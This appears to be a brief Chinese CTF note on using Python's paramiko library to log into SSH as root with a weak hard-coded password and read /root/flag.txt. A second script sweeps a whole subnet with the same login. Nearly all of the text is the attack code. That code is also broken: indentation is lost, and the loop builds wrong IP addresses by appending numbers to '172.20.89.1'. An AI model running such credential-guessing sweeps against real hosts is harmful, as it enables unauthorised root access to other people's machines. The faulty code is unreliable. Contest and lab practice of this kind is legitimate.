本文将讲述如何使用Python编写SSH弱口令读取文件Flag内容
安装Paramiko模块
paramiko模块,基于SSH用于连接远程服务器并执行相关操作。
编写脚本
import paramiko
# 创建ssh连接
sshc = paramiko.SSHClient()
# 第一次连接提示是否继续远程连接,默认勾选yes
sshc.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ip = "172.20.89.123"
try:
try:
sshc.connect(ip,22,'root','1234567',timeout=1)
file = sshc.exec_command("cat /root/flag.txt")[1].readlines()
print(file)
except:
print("SSH连接失败,请检查端口 用户名或密码")
except:
print("time out")
这样,我们就可以通过连接SSH执行cat命令查看flag了。
这个脚本一般在比赛用的笔记多,记录一下。
当然,如果比赛的话,我们也可以用for循环把所有ip遍历的查看flag
import paramiko
# 创建ssh连接
sshc = paramiko.SSHClient()
# 第一次连接提示是否继续远程连接,默认勾选yes
sshc.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ip = "172.20.89.1"
for i in range(1,224):
host = ip+str(i)
print(host)
try:
try:
sshc.connect(host,22,'root','1234567',timeout=1)
file = sshc.exec_command("cat /root/flag.txt")[1].readlines()
print(file)
except:
print("SSH连接失败,请检查端口 用户名或密码")
except:
print("time out")
得到flag结果如下
这样就方便我们获取某个Linux主机上的flag了。